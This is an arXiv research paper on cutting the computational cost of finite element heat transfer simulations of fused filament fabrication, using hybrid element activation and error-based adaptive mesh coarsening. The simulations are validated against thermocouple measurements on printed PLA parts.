Heat transfer simulations of the fused filament fabrication process are an important tool to predict bonding, residual stresses and strength of 3D printed parts. But in order to capture the significant thermal gradients that occur in the FFF printing process, a fine mesh discretization and short time steps are required, leading to extensive computational efforts. In this work a simulation framework is presented which combines several efficiency measures with the objective of reducing the computational efforts required in simulating the FFF printing process without simplifying the deposition physics or reducing the overall accuracy. Thus, the material deposition has been modeled with a hybrid element activation approach and elements are adaptively coarsened through an error-based coarsening condition. Additionally, an appropriate coarsening technique is presented for geometries with air-filled infill patterns. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, its effectiveness is shown by simulating the printing process of a larger geometry.
Nathalie Ramos, Christoph Mittermeier, Josef Kiendl
2023-05-05T11:58:57Z
http://arxiv.org/abs/2305.03455v1
# Efficient Simulation of the Heat Transfer in Fused Filament Fabrication ###### Abstract Heat transfer simulations of the fused filament fabrication process are an important tool to predict bonding, residual stresses and strength of 3D printed parts. But in order to capture the significant thermal gradients that occur in the FFF printing process, a fine mesh discretization and short time steps are required, leading to extensive computational efforts. In this work a simulation framework is presented which combines several efficiency measures with the objective of reducing the computational efforts required in simulating the FFF printing process without simplifying the deposition physics or reducing the overall accuracy. Thus, the material deposition has been modeled with a hybrid element activation approach and elements are adaptively coarsened through an error-based coarsening condition. Additionally, an appropriate coarsening technique is presented for geometries with air-filled infill patterns. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, its effectiveness is shown by simulating the printing process of a larger geometry. **Keywords:** Fused filament fabrication, heat transfer, finite elements, adaptive coarsening, element activation ## 1 Introduction Fused filament fabrication (FFF) is one of the additive manufacturing (AM) or three-dimensional (3D) printing technologies in which hot polymer is extruded in a layer-by-layer fashion along a predetermined path to form a 3D object. FFF is the most commonly-used AM technique due to advantages such as the wide availability of low-price materials, its easy operability and low energy requirements [1],[2],[3]. Although FFF is moving from being primarily a prototyping tool into being a manufacturing tool, the mechanical anisotropy and low mechanical strength of FFF printed parts in comparison to parts produced with traditional polymer manufacturing methods hinder this evolution from happening [2],[4],[5]. One of the causes is the discontinuous nature of the FFF process: a molten fiber is extruded and deposited onto the previously deposited layer, forming bonds with adjacent fibers [6]. This bond interface between layers tends to be the weakest link in FFF printed parts and the strength in z-direction tends to be much lower than in other directions [2]. Additionally, the rapid heating and cooling which occurs during the deposition process leads to high thermal gradients which can result in residual stresses [7]. This can also impact mechanical strength. In both cases, understanding the heat transfer and its significant impact on the bonding and strength of 3D printed parts is crucial in advancing the applicability of FFF [5], [8]. There are several works which address the heat transfer during the FFF printing process, albeit experimentally [6], [9], [10], analytically [11] or numerically. Amico and Peterson used finite element (FE) analysis in COMSOL multiphysics to simulate the deposition of a wall of one road thick [12]. Simulation of nozzle movement and material deposition was achieved using COMSOL's 'deformed geometry' node. Xu et al. also simulated the heat transfer in the FFF printing of a thin wall by using a 3D FE model implemented in C++ originally developed to study heat exchange during metal selective laser melting [9]. However, the deposition of polymer fractions was performed by changing properties of the FE domain from air to polymer. Zhou et al. used the element birth and death feature in FE software Ansys to simulate the deposition process of a cuboid shaped thin walled structure [13]. Cattenone et al. also used sequential element activation for the simulation of a spring and bridge in Abaqus [14]. An extensive review of further appropriate finite element methods for such heat transfer simulations can be found in [15]. In order to accurately capture the significant thermal gradients in these simulations, a very fine mesh discretization and short time steps are required and in return significant computational effort is required and high physical memory demands must be met [14],[16]. Thus, simulations in many of the aforementioned numerical methods have been performed on a small scale. Several strategies have been proposed to achieve compationally efficient frameworks to simulate AM processes. Dimensional reduction has been used in case of simple geometries which allow for a 2D simplification of the 3D geometry [17]. Spatial reduction is another method to reduce the computational effort. A hybrid element activation strategy has been employed in various works as a global remeshing approach [16],[18],[19]. Instead of having all elements representing the final geometry present from the start of the analysis in an inactive state, the final geometry is discretized in a number of subsequent meshes each to which a new quiet layer has been added. Lastly, adaptive meshing is also often used in a bid to minimize the computational expense. Adaptive refinement is typically implemented to achieve a refined, localised mesh in the vicinity of the melt zone or heat affected zone of the heat source [20], [21]. Conversely, entire layers further removed from the heat source can also be adaptively coarsened by lumping them together whilst keeping a homogeneous fine mesh around the heat source. This method has its origins in the numerical simulation of welding and it is now often applied in the simulation of metal AM [16],[22]. These aforementioned techniques are mostly applied in simulations of metal printing where geometries generally tend to be larger and a loss of accuracy is often inevitable as a result. In this work a simulation framework combining various techniques is presented which contributes towards achieving a reduced computational effort in thermal simulations of the FFF printing process, without sacrificing their overall accuracy. An adaptive coarsening framework is developed in which elements are gradually coarsened over the height of a printed part when satisfying an error-based condition instead of coarsening at pre-defined moments which can lead to premature coarsening and an increased loss of accuracy. Additionally, remeshing is applied in the form of a hybrid element activation approach to further reduce the number of degrees of freedom present in the finite element meshes and an appropriate coarsening technique is presented for geometries with air-filled infill patterns. This entire framework is presented in detail together with the governing equations describing the transient heat transfer analysis. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, the effectiveness of the simulation framework is tested on a larger geometry. ## 2 Experimental Set-Up In order to validate the numerical simulations presented in this work, thermal measurements were performed during the printing of a block geometry as shown in figure 1. All of the samples were printed with a Prusa i3 MK3 printer. The material used was polylactic acid (PLA) and its thermal properties as provided by the manufacturer Fillamentum are listed in table 1. The geometry was printed with the process parameters listed in table 2. The experimental set-up is shown in figure 1. K-type thermocouples were used to measure the temperature during the printing of the block at three measuring locations. N1 was located at z=\(\frac{1}{10}\cdot\)h, N2 was located at z=\(\frac{2}{5}\cdot\)h and N3 was located at z=\(\frac{3}{5}\cdot\)h, where h is the height of the block. All three points were situated in the same vertical planes; x=\(\frac{4}{7}\cdot\)w and y=\(\frac{4}{7}\cdot\)l where w and l are the width and length of the block respectively. The temperature was recorded with a Graphtec GL220 data logger with a sampling frequency of 10 Hz. The exact measuring procedure was as follows: the block was initially printed up to the layer where the measuring point was located. The print was then paused for ten seconds to insert the thermocouple at the correct measuring location. This was done by spanning the wire over a printed measuring device (figure 1) which controlled the height and depth at which the thermocouple was placed with respect to the block. After placing the thermocouple, printing was resumed and the recording was started. This process was repeated four times for each measuring location. Thus, a total of 12 samples were printed and subjected to temperature recordings. ## 3 Numerical methods The heat transfer that occurs during the FFF printing process presented in section 2 was numerically simulated by performing a transient thermal analysis. In this section, the finite element model and the efficiency measures to \begin{table} \begin{tabular}{l c c} \hline \hline **Property** & **PLA** & **Air** \\ \hline Density \(\rho\) [kg/m\({}^{3}\)] & 1240 & 1.41 \\ Specific heat capacity \(c_{p}\) [J/kg\(\cdot\)K] & 1800 & 716 \\ Conductivity \(K_{0}\) [W/m\(\cdot\)K] & 0.13 & 0.023 \\ \hline \hline \end{tabular} \end{table} Table 1: Thermal properties PLA and air Figure 1: Experimental model and set-up reduce the computational efforts in simulating the transient thermal analysis of FFF are presented. ### Heat Transfer Analysis Various modes of heat exchange occur during the thermally driven deposition process in FFF [5]. Since the focus in this work is on the heat transfer during the deposition process, all heat transfer mechanisms that occur within the nozzle before and during extrusion are beyond the scope of this work. Starting from the energy balance, the transient heat transfer can be described by the following partial differential equation (PDE) [23]: \[\rho c_{p}\frac{\partial T(\mathbf{x},t)}{\partial t}=\nabla\cdot(K_{0}\nabla T (\mathbf{x},t))+Q \tag{1}\] in which \(T\) [K] is the temperature, \(\rho\) [kg/m\({}^{3}\)] is the material density, \(c_{p}\) [J/kg K] is the specific heat capacity, \(K_{0}\) [W/m K] is the conductivity and \(Q\) [W/m\({}^{3}\)] is the heat source. The left hand side represents the change in the thermal energy storage whereas the first term on the right hand side represents the heat transfer by conduction. The heat flux vector can be identified as \[\mathbf{q}=-K_{0}\nabla T(\mathbf{x},t) \tag{2}\] Solving the initial value problem given by the PDE in eq. 1 requires specification of the initial conditions at every point in the considered domain and specification of the temperatures along the boundary (Dirichlet boundary conditions) or its derivatives (Neumann boundary conditions). The heat flow due to convection is given by Newton's law of cooling which states that the heat energy flowing out per unit time per unit surface is proportional to the difference between the surface temperature \(T_{s}\) [K] and the temperature outside the surface \(T_{\infty}\) [K]: \[-K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot n}=h(T_{s}-T_{\infty}) \tag{3}\] where \(\mathbf{n}\) is the unit vector that points to the outer normal and where \(h\) [W/m\({}^{2}\) K] is the convective heat transfer coefficient. Finally, the heat flux due to radiation is defined by the Stefan-Boltzmann law: \[-K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot n}=\varepsilon\sigma(T_{s}^{4}-T_{ \infty}^{4}) \tag{4}\] \begin{table} \begin{tabular}{l l l} \hline \hline **Process parameter** & **Symbol** & **Value** \\ \hline Printing speed & \(v_{p}\) & 30 mm/s \\ Layer height & \(dh\) & 0.2 mm \\ Filament width & \(wf\) & 0.5 mm \\ Nozzle temperature & \(T_{n}\) & 210 \({}^{\circ}\)C \\ Ambient temperature & \(T_{a}\) & 25 \({}^{\circ}\)C \\ Bed temperature & \(T_{b}\) & 60 \({}^{\circ}\)C \\ Heat transfer coefficient & \(h\) & 25 W/m\({}^{2}\) K \\ \hline \hline \end{tabular} \end{table} Table 2: Process parameters FFF where \(\varepsilon\) is the emissivity and \(\sigma\) is the Stefan-Boltzmann constant. ### Modeling the Material Deposition The continuous material deposition on the build stage or on previously deposited layers was simulated by using sequential element activation. In such an analysis all finite elements representing the fully printed geometry are discretized in the finite element mesh and they are deactivated at the start of the analysis. The deposition process is then simulated by sequentially activating elements in the subsequent time steps along the path of the printing nozzle until the full geometry is activated. An element is initially deactivated by reducing the conductivity and specific heat capacity to near-zero values. Thus, the elements are still present in the FE mesh and the attached degrees of freedom (dofs) are present in the global system of equations, but they don't influence the solution. Conversely, the material properties are restored to their original values upon element activation. The numerical stability and accuracy of such an analysis will depend on the time step size. The time step size was determined by calculating the time required to activate or deposit a single element: \[\Delta t=\frac{dl}{v_{p}} \tag{5}\] where \(dl\) is the dimension of the element in the traveling direction of the nozzle, and \(v_{p}\) is the printing speed. The objective of this work was not to determine an optimal time step size as there are other works which have dedicated significant efforts to this topic [14]. \(\Delta t\) used in the current paper was significantly smaller that what is necessary to capture the cooling rate of PLA, so it was assumed to be small enough. ### Loads and Boundary Conditions Upon element activation, the material deposition was simulated by prescribing the extrusion temperature directly at the nodes of the activated elements; i.e. the load was applied as a Dirichlet boundary condition. The load was prescribed at all nodes of the activated element as opposed to only on those nodes without a solved degree of freedom from the previous time step (figure 2). Even though prescribing the temperature at all nodes could result in convergence issues due to the overwriting of the existing solution at certain nodes, this wasn't encountered in any of the simulations presented in this work (section 4). Moreover, for 8-node thermal finite elements (as used in this work) partial loading would result in only one loaded node in case of adjacent elements which could lead to underestimation of the introduced thermal energy. Thus, this option was not applied. In most FFF printing applications the effects of radiation are negligible as the effect of convection is governing [11]. Thus, the Neumann boundary condition representing convective heat transfer can be expressed as follows: \[K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot}\mathbf{n}+h(T_{b}-T_{\infty})=0\quad \mathbf{x}\in\Gamma_{c} \tag{6}\] where \(\Gamma_{c}\) are the free surfaces of the activated elements. Distiction is made between the free surfaces located at the edges of the geometry \(\Gamma_{c;\;p}\) and the temporary free surfaces which are surfaces adjacent to inactive elements \(\Gamma_{c;\;t}\) (figure 3). During the transient analysis, the latter were continuously updated and identified. The heated printing bed was modeled by prescribing a fixed temperature at the bottom face of the geometry \(\Gamma_{b}\): \[T(\mathbf{x},t)=T_{b}\quad\mathbf{x}\in\Gamma_{b} \tag{7}\] ### Efficiency Measures #### 3.4.1 Remeshing In order to avoid having all dofs present during all time steps required to solve the full geometry, Denlinger et al. proposed a hybrid element activation method [16].Instead of solving the full mesh with many inactive layers in one simulation, often referred to as the quiet activation method, remeshing occurs a predefined number of times until the final geometry is fully solved. Both activation methods are shown schematically in figure 4. Within each remeshing step in the hybrid activation approach, a user-defined number of inactive or quiet layers \(\mathrm{nh}_{\mathrm{add}}\) are added to the mesh and then sequentially activated. The number of times remeshing must occur will depend on \(\mathrm{nh}_{\mathrm{add}}\). In order to ensure continuity of the solution between the meshes of two Figure 3: Application of convective boundary conditions at element surfaces Figure 2: Left: full Dirichlet loading, right: partial Dirichlet loading. Red nodes are loaded upon activation, nodes with pre-existing nodal solution indicated in black subsequent remeshing steps, the solution of the previous mesh must be mapped onto the newly discretized geometry prior to the continuation of the analysis. The nodes within the coinciding part of the geometry of two subsequent meshes will be assigned the solution or nodal temperature of the previous remeshing step as an initial condition. The nodes in the quiet layers will be assigned the ambient temperature \(T_{a}\). Therefore, the initial condition is expressed as: \[T(\mathbf{x},0)=T_{a}\quad\mathbf{x}\in\Omega_{q} \tag{8}\] where \(\Omega_{q}\) represents the quiet part of the discretized domain. In the active part of the domain \(\Omega_{a}\), the initial condition can be expressed as: \[T^{i}(\mathbf{x},0)=T^{i-1}(\mathbf{x},t_{e})\quad\mathbf{x}\in\Omega_{a} \tag{9}\] The temperatures at \(t=0\) in the current remeshing step \(i\) are equal to those at the last time step \(t_{e}\) of the previous remeshing step \(i-1\). #### Adaptive Coarsening The coarsening strategy in this work consists of a gradual coarsening approach: the elements become increasingly larger as the distance to the printing nozzle increases. How the coarsening is done is determined by the coarsening pattern and the moment at which coarsening occurs is determined by the coarsening condition as the coarsening is done adaptively. Figure 4: Various element activation methods The coarsening pattern is controlled by two parameters, namely the number of coarsening levels MLVL and the coarsening factor CF which determines how many elements are merged from one coarsening level to another. Figure 5 shows an example of a 2D coarsened geometry with two levels of coarsening and varying values of CF. CF=2 was applied in all coarsened meshes in this work and thus two elements in x-, two elements in y- and two elements in z-direction were merged to form one coarse element in the subsequent coarsening level. Coarsening will inevitably lead to hanging nodes (figure 5) at the interface between fine and coarse layers and/or between coarse layers of different coarsening levels. These nodes are attached to the elements above the interface layer, but not to the mesh below the interface layer. A continuous solution along this coarser element during the analysis is ensured by defining kinematic constraints prior to solving the global system of equations. Figure 5 shows even meshes where the elements in all coarsening levels are dividable by CFMLVL. This is usually not the case for most meshes and it is accounted for by slightly changing the coarsening pattern in x- and y-direction such that the number of hanging nodes are minimized. The first level in which an uneven number of elements needs to be coarsened will contain one coarse element that merges an uneven number of elements. The maximum size of this element (length or width) is: \[l_{\mathrm{max}}\leq 1.5\cdot 2^{k}\cdot l \tag{10}\] where \(l_{\mathrm{max}}\) is the maximum length of an element and where \(k\) is coarsening level in which the element is coarsened. All neighbouring elements follow CF=2. This can be seen in LVL 2 of figure 5(a) and LVL 1 of figure 5(b). If the condition isn't satisfied, the uneven element from the previous level is transferred to the next coarsening level without any merging with other elements (LVL 2 in figure 5(b)). This also means that there won't be any hanging nodes at the location of the deviating element in the interface layer. Figure 5: Similarly sized geometries with gradual coarsening patterns (varying CF). Hanging nodes shown in red. Coarsening occurs when the temperature difference at all nodes between the meshes of two subsequent remeshing steps is smaller than a user-defined threshold. The coarsening condition is checked for each node in the layer that is up for coarsening in the current mesh in remeshing step \(i\) and its potentially coarsened mesh. Comparison with the potential mesh will determine if coarsening is appropriate before actually doing so in remeshing step \(i+1\). The element configuration in the potential mesh is identical to that of the current mesh, except for the next layer that is up for coarsening (figure 7). Coarse element dimensions are prematurely assigned to the elements in this layer. The coarsening condition can be expressed as follows: \[\left|\frac{T_{j}-\hat{T}_{j}}{T_{j}}\right|<\varepsilon \tag{11}\] where \(T_{j}\) is the temperature at node \(j\) in the current mesh and where \(\varepsilon\) is the user-defined coarsening threshold. \(\hat{T}_{j}\) is the temperature at the projected location of node \(j\) in the potential mesh. As this node is not present in the potential mesh, \(\hat{T}_{j}\) must be calculated by linearly interpolating the nodal temperatures of the eight corner nodes of the coarse element (figure 6(c)). \(\varepsilon\) can be defined to be as small as the user deems fit. The influence of \(\varepsilon\) will be investigated in section 4. If all nodes in the potentially coarsened layer satisfy the coarsening condition, coarsening of that layer is appropriate. The same process can be repeated for the other layers in the various coarsening levels. As soon as the coarsening condition isn't met, the nodal coordinates and temperatures from the last approved potential mesh in remeshing step \(i\) are saved for mapping in remeshing step \(i+1\). The thermal transient analysis in remeshing step \(i\) can then be concluded. #### Homogenizing Infill Geometries An example of a layer with a rectilinear infill pattern with air content is schematically shown in figure 8. When simulating the deposition of such a layer Figure 6: Coarsening patterns in meshes with uneven element configurations air elements must be activated in addition to the PLA elements. Air elements adjacent to polymer elements are activated simultaneously within the same time step, since they don't contribute to the actual printing time. Coarsening of elements that meet the coarsening condition can be done in the same manner as described in section 3.4.2. The main difference is that elements that are to be merged can consist of only air, only polymer or a combination of both materials. It was found in [24] that when modeling geometries with complex, air-filled infill structures, accurate heat transfer can be simulated with simplified infill structures as long as the infill density is respected. Thus, instead of considering the exact material configuration of the merged elements, effective or homogenized material properties are assigned to coarsened elements in which the influence of the infill density \(\alpha\) of the printed part is included (figure 8). The exact infill pattern is always respected in the fine layers by exactly following the deposition path of the printing nozzle during the element activation. Figure 7: Adaptive coarsening: comparison between current mesh and potential mesh There are various methods to calculate effective properties of heterogeneous materials and porous media [25]. In this work a simple approach is chosen to calculate effective values of the relevant thermal properties, i.e. the conductivity and the (volumetric) heat capacity: \[K_{0;\;eff}=(1-\alpha)\cdot K_{0;\;air}+\alpha\cdot K_{0;\;pol} \tag{12}\] \[C_{eff}=(1-\alpha)\cdot C_{air}+\alpha\cdot C_{pol} \tag{13}\] \[C_{air}=\rho_{air}\cdot c_{p;\;air} \tag{14}\] \[C_{pol}=\rho_{pol}\cdot c_{p;\;pol} \tag{15}\] \[\alpha=\frac{V_{pol}}{V_{air}+V_{pol}} \tag{16}\] where subscripts \({}_{air}\) and \({}_{pol}\) refer to air and polymer respectively, where \(C\) is the volumetric heat capacity [J/m\({}^{3}\) K] and where \(V\) is the volume of a material in the printed part. ### Numerical set-up All simulations presented in this work were carried out in Ansys Mechanical APDL V19.2. All geometries were discretized with SOLID70, 3D 8-node thermal finite elements. The thermal properties that were assigned to the elements are listed in table 1. These properties were also used to calculate the homogenized material properties assigned to the coarsened elements in the infill geometries. The dimensions of the non-coarsened elements were determined by the geometry of the filaments of the printed geometries. The element width \(wf\) was chosen to be equal to the filament width, the element length \(dl\) was assumed to be equal to the element width and the element height \(dh\) was equal to the layer height. Figure 8: left: Layer with an infill pattern (polymer in red and air in blue), right: effective material properties in coarsened layers (indicated in green) ## 4 Results & Discussion ### Experimental results Figure 9 shows the results of the thermal measurements performed with the thermocouples during the printing of the block at the three measuring locations N1, N2, N3. For each measuring location, the measured average temperature as well as the temperature envelope are plotted as a function of time. The \(T(t)\) graphs don't start at \(t=0\) which would be the start of the printing process, but at the time at which the filament is deposited on top of the thermocouple. It can be seen that the measured deposition temperature, captured by the first peak in the \(T(t)\) graph, does not equal the prescribed nozzle temperature \(T_{n}\) of \(210^{\circ}\)C at any of the measuring locations. The temperature of the deposited filament was repeatedly measured to be significantly lower than the nozzle temperature. This observation was also made in [26]. Thus, instead of using the nozzle temperature in the numerical simulations, the average deposition temperature from all the experimental measurements of \(175^{\circ}\)C was used as the activation temperature. Figure 9: Experimental thermal measurements at various measuring locations ### Validation simulation framework Before experimentally validating the simulation framework, the validity of the simulation framework is presented by investigating the effect of the efficiency measures on the numerical accuracy. #### Numerical validation In the first simulation **M-1**, the block geometry was fully solved with the quiet method, so no remeshing occured between start and finish of the simulation. This is the default simulation to which other results will be compared. In the second simulation the mesh was solved with the hybrid activation method; remeshing occured every time one full layer was activated (**M-2**). In the third simulation, the mesh was solved with the coarsening framework, thus both remeshing and adaptive coarsening occured (**M-3**). The default remeshing and coarsening parameters are listed in table 3. The efficiency of the coarsening framework is measured by comparing the total computional time required for the simulations of M-1, M-2 and M-3. The results are listed in table 3 and shown in figure 10. A total number of 62,720 time steps was required to solve the full geometry for all of the models. It can be seen the inclusion of remeshing reduced the computational time to 50% of that of M-1. The application of both remeshing and coarsening reduced the computational time to 19% of that of the default model. Figure 10 shows a linear evolution of the number of dofs over time for M-2 since a fixed number of dofs was added each time the geometry was remeshed. In case of M-1 this number was constant over time as all the dofs were present from the start. When looking at the results for M-3, a clear effect of the adaptive coarsening can be seen; the number of dofs was significantly reduced each time coarsening of the mesh occured. On average the total number of dofs was quite constant and significantly less than in M-1 and M-2. The numerical accuracy of the simulation framework is assessed by comparing the evolution of the temperature over time \(T(t)\) for the three different models M-1, M-2 and M-3. The \(T(t)\) results are presented in figure 10. There is very good agreement between the three models for all of the measurement points. The model with both remeshing and coarsening is perfectly capable of capturing the (re)heating peaks and cooling of the filament that is displayed by the finest mesh M-1. Thus, at a local level model M-3 agrees well with both M-1 and M-2. A global comparison of the temperature fields has also been made by looking at the temperature contour plots at various moments during the simulation. These are shown in figures 11 & 12. For M-1 only the active part of the mesh has been displayed. There is also great agreement between the fine and coarsened mesh in the global temperature profiles. Model M-3 is capable of accurately capturing the correct local and global solution as displayed in the fine mesh without any remeshing and coarsening. \begin{table} \begin{tabular}{l c c c c c c c c c} \hline & **M-1** & **M-2** & **M-3** & **M-4** & **M-5** & **M-6** & **M-7** & **M-8** & **M-9** \\ \hline \(\mathrm{nh_{add}}\) & n.a. & 1 & 1 & 2 & 4 & 1 & 1 & 1 & 1 \\ CF & n.a. & n.a. & 2 & 2 & 2 & 2 & 2 & n.a. & 2 \\ CLVL & n.a. & n.a. & 3 & 3 & 3 & 3 & n.a. & 3 \\ \(\varepsilon\) & n.a. & n.a. & 0.01 & 0.01 & 0.01 & 0.02 & 0.05 & n.a. & 0.05 \\ \(\alpha\) & 1 & 1 & 1 & 1 & 1 & 1 & 0.5 & 0.5 \\ \hline \(\mathrm{t_{c}}\) [-] & 1 & 0.5 & 0.19 & 0.19 & 0.22 & 0.16 & 0.16 & 0.35 & 0.24 \\ \hline \end{tabular} \end{table} Table 3: Computational times \(\mathrm{t_{c}}\) (relative to default model M-1) for models with varying remeshing & coarsening parameters Figure 10: Influence of remeshing and coarsening: M-1 vs. M-2 vs. M-3 Figure 11: Temperatures after solving 25% of the geometry. Left: Fine mesh (M-1), right: coarsened mesh (M-3). Cross-sectional plane at y=\(\frac{4}{7}\).1 Figure 12: Temperatures after solving 75% of the geometry. Left: Fine mesh (M-1), right: coarsened mesh (M-3). Cross-sectional plane at y=\(\frac{4}{7}\).1 ### Experimental validation The numerical results generated with model **M-3** are plotted against the experimental thermal measurements for each measuring point in figure 13. The overall trend in the \(T(t)\) evolution is captured well by the simulations. It can be seen that the temperatures are slightly underestimated in the simulation for point N1. This also happens to be the point which is most sensitive to the influence of the thermal boundary conditions as it is located at the bottom part of the printed sample (\(z=\frac{1}{10\cdot h}\)). There is great agreement between the experimental and numerical results for measuring point N2 and the deviations between the results for N3 are quite small as well (\(\approx 5\%\)). For all measurement points it can be seen that the temperature at the first and second (re)heating peak is different for the simulation and experiments. The average deposition temperature was used as the element activation temperature in the simulations, thus deviation from the experimental values was to be expected. During the experimental measurements a different deposition temperature was registered at each measurement point. The deviation in the second reheating peak is a direct result of the numerical load application; when an element is activated, the deposition temperature is prescribed at all nodes of that element (section 3.2). This seems to be an overestimation of what occurs in reality. Figure 13: Experimental validation of numerical model **M-3** ### Variation of numerical parameters The default remeshing and coarsening parameters as listed in table 3 were applied in simulations M-2 and M-3. Varying the parameters \(\mathrm{nh_{add}}\) and \(\varepsilon\) can influence the efficiency and/or accuracy of the simulations compared to the default model M-1. The first parameter that was varied is \(\mathrm{nh_{add}}\). This parameter influences the computational time as it controls the trade-off between the number of inactive dofs present in remeshing step versus the number of times remeshing occurs. To investigate this, the simulations were additionally performed for \(\mathrm{nh_{add}}\)=2 (**M-4**) and \(\mathrm{nh_{add}}\)=4 (**M-5**). Table 3 shows that the computational time is similar for the models with one (M-3) and two quiet layers (M-4). However, the computational time was increased by 15% when four quiet layers were added instead of one. This implies that it is more efficient to remesh often even if it means going through preprocessing more often vs. remeshing less frequently and having more number of dofs in each discretized geometry. The accuracy is also compared by looking at \(T(t)\) of the aforementioned models (figure 14) and the temperature contour plots at the last time step of the last remeshing step (figure 15). There is great agreement between the fine model and the coarsened models with varying \(\mathrm{nh_{add}}\). Next, the effect of coarsening parameter \(\varepsilon\) was investigated. Since the simulation M-3 with \(\varepsilon\)=0.01 already yielded very accurate results compared to the results of the fine model, the value of \(\varepsilon\) was varied between 0.01 and 0.05 for **M-6** and **M-7** (table 3). The comparison of \(T(t)\) between the fine model M-1 and the models with varying \(\varepsilon\) is shown in figure 16. It can be seen that even for \(\varepsilon\)=0.05, there is still good agreement with the fine model, especially at the initial stages of the simulation. The heating and reheating peaks upon element activation were accurately captured. Small differences can be observed after the influence of the nozzle fades for \(\varepsilon\)=0.05 (M-7) as the temperatures measured in M-7 are approximately 5% higher compared to M-1. This is an indicator that coarsening occured too early at a certain point in the simulation. However, the results at node 1 show that this difference decreases again as a steady-state is approached. The global temperatures are displayed for the last time step in the last remeshing step (figure 17). The results are again very similar, but it can be seen that M-3 only reached two levels of coarsening whereas M-6 and M-7 both reached three levels of coarsening. This explains the difference in computational time, which is listed for each model in table 3. For \(\varepsilon\)=0.05 the computational time was reduced by approximately 15% compared to \(\varepsilon\)=0.01. Figure 14: Influence of \(\rm{nh_{add}}\) Figure 15: Temperatures in last time step of the final coarsened meshes for models with varying \(\rm{nh_{add}}\). Cross-sectional plane at y=\(\frac{4}{7}\).l Figure 16: Influence of \(\varepsilon\) Figure 17: Temperatures in last time step of the final coarsened meshes for models with varying \(\varepsilon\). Cross-sectional plane at y=\(\frac{4}{7}\cdot\)1 ### Homogenized infill structures The applicability of the simulation framework on geometries with an air-filled infill pattern was tested in a similar fashion as was done in the previous section: the results of the thermal analysis on the geometry with a fine mesh was compared to the results of the thermal analysis on the same geometry but with a discretization that included adaptive coarsening. Remeshing was applied in both simulations. A rectilinear infill pattern with an infill density of 50% was applied in both models. The model without any coarsening is described by model **M-8** whereas the model which includes coarsening is described by model **M-9**. All remeshing and coarsening parameters for these models are listed in table 3. The meshes and temperature contour plots from the last remeshing step are shown in figure 18 & 19 respectively. Figure 19 shows that there is very good agreement between M-8 and M-9. The temperatures in the fine and coarsened parts of the mesh in model M-8 coincided very well with that of the fully fine mesh. It confirms that the homogenized material properties that were assigned to the coarse elements managed to capture the thermal behaviour of the air-PLA infill quite well. Model M-8 reached three levels of coarsening, even though the number of fine non-coarsened layers was relatively high (figure 18). Compared to the geometry with a dense infill (M-7 from figure 17), there were more fine layers present in the coarsened model where the infill density is 50%. It seems that the coarsening condition was satisfied more easily once the elements are homogenized, compared to the first coarsening level where the transition occured from the heterogeneous mesh to the homogenized mesh. When comparing the computational times, it can be seen that M-8 was solved significantly faster than its dense counterpart M-2, despite having the same total number of dofs. The difference can be attributed to the decrease in the total number of time steps for M-8. Even though the coarsened model M-9 was still more efficient than M-8, it lagged behind the efficiency of the densely coarsened model M-7. It seems that the significant increase in number of dofs outweighed the decrease in the total number of time steps. ### Bridge Geometry All of the numerical methods presented in the previous sections were tested on a bridge geometry (figure 20). This geometry is inspired by [14] and a rectilinear infill pattern with an infill percentage of 25% was applied (figure 20). The homogenized material properties assigned to the coarsened elements were calculated with equations 12-16. All process parameters which were used to simulate the printing process are listed in table 2. A time step size 0.267s was applied. The initial and boundary conditions were applied in a similar fashion as for the block geometry (section 3.3). The main difference is that the bridge geometry has additional external free surfaces which were subjected to convective heat transfer. The coarsening parameters were chosen as follows: * MLVL=3 Figure 19: Temperatures in the last time step of the final meshes with an infill geometry. Left: Fine mesh, right: coarsened mesh. Cross-sectional plane at y=\(\frac{4}{7}\):l Figure 18: Mesh for infill geometries with a 50% infill density in final remeshing step. Cyan: PLA elements, purple: air elements, red: homogenized elements * CF=2 * nh\({}_{\rm add}\)=2 * \(\varepsilon\)=0.05 The final coarsened mesh from the last remeshing step (figure 20) shows that three levels of coarsening were reached in the majority of the geometry. There are less fine layers present compared to the block geometry (figure 18) which could be attributed to the larger overall printing time of the bridge, more cooling time for each printed layer and thus easier satisfaction of the coarsening condition. The maximum number of coarsening levels was restricted by the width of the bridge pillars, but the significant amount of layers in the coarsest level would otherwise allow for additional coarsening levels. The temperature contour plots are shown in figure 21 for various stages of the printing process. For each remeshing step shown, the temperatures are plotted as the PLA filaments are printed in the \(0^{\circ}\)-direction (global x-direction). It can be seen that the coarsened layers have an even temperature distribution, whereas the influence of the printed filaments only reaches a few (fine) layers below the printed layer. This is an observation which is in agreement with the experimental measurements. The number of fine layers remains fairly constant throughout the various printing stages. Overall, the presented simulation framework also seems to work well on more complex geometries. Figure 20: Bridge model ## 5 Conclusion A simulation framework has been presented for the transient thermal analysis of the fused filament fabrication (FFF) printing process. A hybrid element activation approach and adaptive coarsening have been applied to reduce the computational expense that is normally attached to heat transfer simulations of the FFF printing process. Additionally, the objective was to minimize the loss of accuracy and to have an accurate representation of the deposition physics. The simulation framework has been validated with experimental thermal measurements that were performed during the printing of a block. The comparison showed good agreement between the results, especially towards the center of the printed block. An important finding of this research is that the activation temperature in the simulations has to be significantly lower than Figure 21: Temperature contour plots during various printing stages of the bridge geometry the nozzle temperature. This is often not considered in heat transfer simulations of the FFF printing process. The applicability of the framework was also assessed by looking at its numerical accuracy and efficiency for geometries with both a dense infill and an air-filled infill pattern. The computational time of the simulations on meshes where both remeshing and adaptive coarsening were applied was approximately one fifth of the computational time simulations on a geometry with a fine mesh without any efficiency measures. Moreover, great agreement was found between the models, both locally and globally. Good agreement was also found between the models in which the part had an air-filled infill pattern. The homogenized material properties based on the infill density on the printed part which were assigned to the coarsened part of the mesh were able to capture the thermal behaviour of heterogeneous material well. Overall, the framework shows great potential for efficiently simulating heat transfer in the FFF printing process. The framework could be further improved by optimization of the time step size and a more accurate load prescription. The next step would be to extend the simulation framework to thermo-mechanical simulations for residual stress prediction.
2307.12321
Propagation of generalized Korteweg-de Vries solitons along large-scale waves
